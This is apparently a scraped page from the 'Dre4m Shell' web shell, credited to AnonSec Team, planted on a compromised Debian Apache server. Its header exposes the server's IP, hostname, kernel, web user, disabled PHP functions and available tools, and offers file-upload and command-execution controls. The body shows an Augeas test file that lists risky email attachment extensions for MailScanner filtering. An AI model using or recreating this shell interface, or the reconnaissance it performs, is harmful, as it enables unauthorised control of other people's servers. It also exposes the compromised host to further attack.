Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.147.54.100
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/3/root/usr/share/augeas/lenses/dist/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/3/root/usr/share/augeas/lenses/dist/tests/test_mailscanner_rules.aug
module Test_Mailscanner_Rules =
let conf = "# JKF 10/08/2007 Adobe Acrobat nastiness
rename	\.fdf$			Dangerous Adobe Acrobat data-file						Opening this file can cause auto-loading of any file from the internet

# JKF 04/01/2005 More Microsoft security vulnerabilities
deny	\.ico$			Windows icon file security vulnerability					Possible buffer overflow in Windows
allow	\.(jan|feb|mar|apr|may|jun|june|jul|july|aug|sep|sept|oct|nov|dec)\.[a-z0-9]{3}$	-	-
deny+delete	\.cur$			Windows cursor file security vulnerability					Possible buffer overflow in Windows
andrew@baruwa.com,andrew@baruwa.net	\.reg$		Possible Windows registry attack						Windows registry entries are very dangerous in email
andrew@baruwa.com andrew@baruwa.net	\.chm$		Possible compiled Help file-based virus						Compiled help files are very dangerous in email
rename to .ppt	\.pps$		Renamed .pps to .ppt							Renamed .pps to .ppt
"

test Mailscanner_Rules.lns get conf =
    { "#comment" = "JKF 10/08/2007 Adobe Acrobat nastiness" }
    { "1"
        { "action" = "rename" }
        { "regex" = "\.fdf$" }
        { "log-text" = "Dangerous Adobe Acrobat data-file" }
        { "user-report" = "Opening this file can cause auto-loading of any file from the internet" }
    }
    {}
    { "#comment" = "JKF 04/01/2005 More Microsoft security vulnerabilities" }
    { "2"
        { "action" = "deny" }
        { "regex" = "\.ico$" }
        { "log-text" = "Windows icon file security vulnerability" }
        { "user-report" = "Possible buffer overflow in Windows" }
    }
    { "3"
        { "action" = "allow" }
        { "regex" = "\.(jan|feb|mar|apr|may|jun|june|jul|july|aug|sep|sept|oct|nov|dec)\.[a-z0-9]{3}$" }
        { "log-text" = "-" }
        { "user-report" = "-" }
    }
    { "4"
        { "action" = "deny+delete" }
        { "regex" = "\.cur$" }
        { "log-text" = "Windows cursor file security vulnerability" }
        { "user-report" = "Possible buffer overflow in Windows" }
    }
    { "5"
        { "action" = "andrew@baruwa.com,andrew@baruwa.net" }
        { "regex" = "\.reg$" }
        { "log-text" = "Possible Windows registry attack" }
        { "user-report" = "Windows registry entries are very dangerous in email" }
    }
    { "6"
        { "action" = "andrew@baruwa.com andrew@baruwa.net" }
        { "regex" = "\.chm$" }
        { "log-text" = "Possible compiled Help file-based virus" }
        { "user-report" = "Compiled help files are very dangerous in email" }
    }
    { "7"
        { "action" = "rename to .ppt" }
        { "regex" = "\.pps$" }
        { "log-text" = "Renamed .pps to .ppt" }
        { "user-report" = "Renamed .pps to .ppt" }
    }

Anon7 - 2022
AnonSec Team